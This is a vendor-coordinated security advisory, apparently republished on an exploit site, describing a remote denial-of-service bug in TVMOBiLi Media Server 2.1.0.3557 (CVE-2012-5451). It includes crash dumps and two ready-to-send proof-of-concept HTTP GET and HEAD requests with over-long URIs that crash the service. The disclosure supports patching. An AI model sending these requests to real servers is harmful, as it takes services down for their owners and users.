TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

2012-12-07T00:00:00
ID 1337DAY-ID-19912
Type zdt
Reporter High-Tech Bridge
Modified 2012-12-07T00:00:00

Description

TVMOBiLi Media Server version 2.1.0.3557 suffers from a denial of service vulnerability via a malicious HTTP request.

                                        
                                            Product: TVMOBiLi media server
Vendor: TVMOBiLi
Vulnerable Version(s): 2.1.0.3557 and probably prior version
Tested Version: 2.1.0.3557 in Windows XP SP3 32 bits
Vendor Notification: October 15, 2012 
Vendor Patch: November 21, 2012 
Public Disclosure: December 5, 2012 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130]
CVE Reference: CVE-2012-5451
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451

1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details


MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
  EIP: 78abe2ad mov [edx],al
  EAX: 00b8fd3e (  12123454) -> injected stream (stack)
  EBX: 00000019 (        25) -> N/A
  ECX: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp N/A
  EDI: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
  EBP: 00b8f61c (  12121628) -> sx xx'(x(x0kxxT$|$| (stack)
  ESP: 00b8f60c (  12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
  +00: 78abe2ff (2024530687) -> N/A
  +04: 00000000 (         0) -> N/A
  +08: 0000011f (       287) -> N/A
  +0c: 00000002 (         2) -> N/A
  +10: 00b8f8ac (  12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
  0x78abe28e jnc 0x78abe2f9
  0x78abe290 outsb
  0x78abe292 and fs:[eax],al
  0x78abe296 test byte [ecx+0xc],0x40



Proof of Concept
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:


GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details

MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000

CONTEXT DUMP
  EIP: 78abe2ad mov [edx],al
  EAX: 00b8fd3e (  12123454) -> injected stream (stack)
  EBX: 00000019 (        25) -> N/A
  ECX: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp N/A
  EDI: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
  EBP: 00b8f61c (  12121628) -> sx xx'(x(x0kxxT$|$| (stack)
  ESP: 00b8f60c (  12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
  +00: 78abe2ff (2024530687) -> N/A
  +04: 00000000 (         0) -> N/A
  +08: 0000011f (       287) -> N/A
  +0c: 00000002 (         2) -> N/A
  +10: 00b8f8ac (  12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
  0x78abe28e jnc 0x78abe2f9
  0x78abe290 outsb
  0x78abe292 and fs:[eax],al
  0x78abe296 test byte [ecx+0xc],0x40



Proof of Concept
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:


HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None




-----------------------------------------------------------------------------------------------

Solution:

Upgrade to TVMOBiLi 2.1.0.3974

More Information:
http://forum.tvmobili.com/viewtopic.php?f=7&t=55117
http://dev.tvmobili.com/changelog.php

-----------------------------------------------------------------------------------------------

#  0day.today [2018-02-17]  #